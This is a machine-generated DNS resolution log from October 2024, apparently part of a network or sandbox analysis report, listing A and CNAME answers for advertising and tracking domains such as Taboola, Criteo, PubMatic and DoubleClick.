                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com52.200.121.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com3.220.154.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com44.206.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.908416986 CEST1.1.1.1192.168.2.40xc7adNo error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.908804893 CEST1.1.1.1192.168.2.40x15a8No error (0)us.creativecdn.com185.184.10.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.910141945 CEST1.1.1.1192.168.2.40xc38eNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.910141945 CEST1.1.1.1192.168.2.40xc38eNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.910141945 CEST1.1.1.1192.168.2.40xc38eNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.910141945 CEST1.1.1.1192.168.2.40xc38eNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.910141945 CEST1.1.1.1192.168.2.40xc38eNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.913752079 CEST1.1.1.1192.168.2.40x6057No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.922354937 CEST1.1.1.1192.168.2.40x3418No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.922354937 CEST1.1.1.1192.168.2.40x3418No error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.922378063 CEST1.1.1.1192.168.2.40xe8d0No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.277903080 CEST1.1.1.1192.168.2.40xad5eNo error (0)s0.2mdn.net172.217.16.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.309855938 CEST1.1.1.1192.168.2.40x2f83No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.309855938 CEST1.1.1.1192.168.2.40x2f83No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.309855938 CEST1.1.1.1192.168.2.40x2f83No error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.309986115 CEST1.1.1.1192.168.2.40x36e6No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.309986115 CEST1.1.1.1192.168.2.40x36e6No error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.787471056 CEST1.1.1.1192.168.2.40xef52No error (0)cdn.doubleverify.comcdn.doubleverify.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.788718939 CEST1.1.1.1192.168.2.40x32f4No error (0)cdn.doubleverify.comcdn.doubleverify.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.917924881 CEST1.1.1.1192.168.2.40x3382No error (0)sync.adkernel.com1.cpm.ak-is2.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.917924881 CEST1.1.1.1192.168.2.40x3382No error (0)1.cpm.ak-is2.net103.67.200.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.918551922 CEST1.1.1.1192.168.2.40x1be0No error (0)sync.adkernel.com1.cpm.ak-is2.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.943175077 CEST1.1.1.1192.168.2.40xccbaNo error (0)u.ipw.metadsp.co.ukpool-eu.rome.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.943175077 CEST1.1.1.1192.168.2.40xccbaNo error (0)pool-eu.rome.iponweb.netrome-stable-europe-west4.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.943175077 CEST1.1.1.1192.168.2.40xccbaNo error (0)rome-stable-europe-west4.pumpkin.uverse.iponweb.net35.214.132.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.943434000 CEST1.1.1.1192.168.2.40xb765No error (0)u.ipw.metadsp.co.ukpool-eu.rome.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:46.943434000 CEST1.1.1.1192.168.2.40xb765No error (0)pool-eu.rome.iponweb.netrome-stable-europe-west4.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.092890024 CEST1.1.1.1192.168.2.40xc7e2No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.092890024 CEST1.1.1.1192.168.2.40xc7e2No error (0)simage2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.092890024 CEST1.1.1.1192.168.2.40xc7e2No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.093769073 CEST1.1.1.1192.168.2.40xf51No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.093769073 CEST1.1.1.1192.168.2.40xf51No error (0)simage2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.289247036 CEST1.1.1.1192.168.2.40x7a0aNo error (0)t.adx.opera.comoutspot2-ams.adx.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.289282084 CEST1.1.1.1192.168.2.40xf97cNo error (0)t.adx.opera.comoutspot2-ams.adx.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.289282084 CEST1.1.1.1192.168.2.40xf97cNo error (0)outspot2-ams.adx.opera.com82.145.213.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.538541079 CEST1.1.1.1192.168.2.40x3c55No error (0)dsp-cookie.adfarm1.adition.com80.82.210.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.562879086 CEST1.1.1.1192.168.2.40x9009No error (0)dsp-ap.eskimi.com188.42.63.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.750967026 CEST1.1.1.1192.168.2.40x2019No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.38.120.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.89.9.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.89.9.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.89.9.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.75.86.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.818834066 CEST1.1.1.1192.168.2.40xa130No error (0)onetag-sys.com51.89.9.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)csync.loopme.meenvoy-hl.envoy-csync.core-002-ew4.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.230.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.239.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.253.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com35.214.219.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.248.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com35.214.216.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.233.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.228.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com34.1.231.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com35.214.219.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885099888 CEST1.1.1.1192.168.2.40xb494No error (0)envoy-hl.envoy-csync.core-002-ew4.ov1o.com35.214.145.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.885111094 CEST1.1.1.1192.168.2.40xb833No error (0)csync.loopme.meenvoy-hl.envoy-csync.core-002-ew4.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.908154964 CEST1.1.1.1192.168.2.40x4cc4No error (0)d5p.de17a.comnlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.913505077 CEST1.1.1.1192.168.2.40xbe26No error (0)d5p.de17a.comnlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.913505077 CEST1.1.1.1192.168.2.40xbe26No error (0)nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com13.50.192.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:47.913505077 CEST1.1.1.1192.168.2.40xbe26No error (0)nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com13.53.196.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.056902885 CEST1.1.1.1192.168.2.40x2257No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.056902885 CEST1.1.1.1192.168.2.40x2257No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.056902885 CEST1.1.1.1192.168.2.40x2257No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057873011 CEST1.1.1.1192.168.2.40xab11No error (0)aa.agkn.comActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057873011 CEST1.1.1.1192.168.2.40xab11No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com18.197.252.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057873011 CEST1.1.1.1192.168.2.40xab11No error (0)ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com52.58.104.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057881117 CEST1.1.1.1192.168.2.40xf6baNo error (0)aa.agkn.comActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.202.150.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.81.250.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.64.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.82.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.246.173.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.114.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.81.86.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.057976961 CEST1.1.1.1192.168.2.40x9fafNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.128.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.085073948 CEST1.1.1.1192.168.2.40x5011No error (0)c.betrad.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.085196018 CEST1.1.1.1192.168.2.40xcbedNo error (0)c.betrad.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.091300011 CEST1.1.1.1192.168.2.40x751fNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.091373920 CEST1.1.1.1192.168.2.40xc776No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.093664885 CEST1.1.1.1192.168.2.40xea39No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.093664885 CEST1.1.1.1192.168.2.40xea39No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.093664885 CEST1.1.1.1192.168.2.40xea39No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.093664885 CEST1.1.1.1192.168.2.40xea39No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.093664885 CEST1.1.1.1192.168.2.40xea39No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.097629070 CEST1.1.1.1192.168.2.40x9beeNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.108014107 CEST1.1.1.1192.168.2.40x6bb2No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.110114098 CEST1.1.1.1192.168.2.40xacecNo error (0)ad.doubleclick.net142.250.185.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.110811949 CEST1.1.1.1192.168.2.40x963dNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.143153906 CEST1.1.1.1192.168.2.40xad5bNo error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.143153906 CEST1.1.1.1192.168.2.40xad5bNo error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.143153906 CEST1.1.1.1192.168.2.40xad5bNo error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.253446102 CEST1.1.1.1192.168.2.40x6b28No error (0)ipac.ctnsnet.com35.186.193.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254295111 CEST1.1.1.1192.168.2.40x77b9No error (0)pool.admedo.compool-com.adizio.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254295111 CEST1.1.1.1192.168.2.40x77b9No error (0)pool-com.adizio.iponweb.netadizio.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254295111 CEST1.1.1.1192.168.2.40x77b9No error (0)adizio.geo.iponweb.netadizio-stable-europe-west1.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254295111 CEST1.1.1.1192.168.2.40x77b9No error (0)adizio-stable-europe-west1.pumpkin.uverse.iponweb.net35.206.140.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254695892 CEST1.1.1.1192.168.2.40xcdaeNo error (0)pool.admedo.compool-com.adizio.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254695892 CEST1.1.1.1192.168.2.40xcdaeNo error (0)pool-com.adizio.iponweb.netadizio.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.254695892 CEST1.1.1.1192.168.2.40xcdaeNo error (0)adizio.geo.iponweb.netadizio-stable-europe-west1.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.281208992 CEST1.1.1.1192.168.2.40x712eNo error (0)d.agkn.comdata.agkn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.281208992 CEST1.1.1.1192.168.2.40x712eNo error (0)data.agkn.comtag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.281208992 CEST1.1.1.1192.168.2.40x712eNo error (0)tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com3.122.38.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.281208992 CEST1.1.1.1192.168.2.40x712eNo error (0)tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com3.67.231.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.282618999 CEST1.1.1.1192.168.2.40x38f8No error (0)d.agkn.comdata.agkn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.282618999 CEST1.1.1.1192.168.2.40x38f8No error (0)data.agkn.comtag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.365614891 CEST1.1.1.1192.168.2.40x2a3dNo error (0)ad.mrtnsvr.com34.102.163.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)dsp.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com54.77.21.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com52.213.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com52.210.175.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com54.76.230.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com52.214.119.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com52.214.67.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com108.128.214.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399250984 CEST1.1.1.1192.168.2.40x2f17No error (0)euw-ice.360yield.com63.32.151.81A (IP address)IN (0x0001)false
